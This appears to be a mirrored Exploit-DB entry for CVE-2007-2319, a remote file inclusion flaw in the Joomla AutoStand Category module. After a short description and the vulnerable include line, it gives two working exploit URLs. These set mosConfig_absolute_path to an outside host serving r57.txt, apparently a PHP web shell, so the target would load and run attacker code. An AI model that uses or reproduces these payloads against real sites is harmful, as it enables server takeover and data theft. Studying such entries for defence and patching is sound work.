- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3734
- Проверка EDB
-
- Пройдено
- Автор
- COLD ZERO
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-2319
- Дата публикации
- 2007-04-14
Код:
=======================================================
Joomla Module AutoStand Category <= 1.1 Remote File include Vulnerabilities
=======================================================
Found By : Cold z3ro , [email protected]
=======================================================
Homepage: www.Hack-Teach.com
=======================================================
Script Site :
http://www.joomlafrance.org/telecharger/startdown/AutoStand_Category.html
=======================================================
Description: its a joomla module Shows the categories created
=======================================================
File : /mod_as_category/mod_as_category.php
# include($mosConfig_absolute_path .
"/components/com_autostand/languages/portuguese.php <= line 10
# Don't allow direct acces to the file
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not
allowed.' ); <= line 21+22
========================================================
/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/modules/mod_as_category.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
=======================================================
#Long Life Palestine
#www.Hack-Teach.com
# milw0rm.com [2007-04-14]- Источник
- www.exploit-db.com
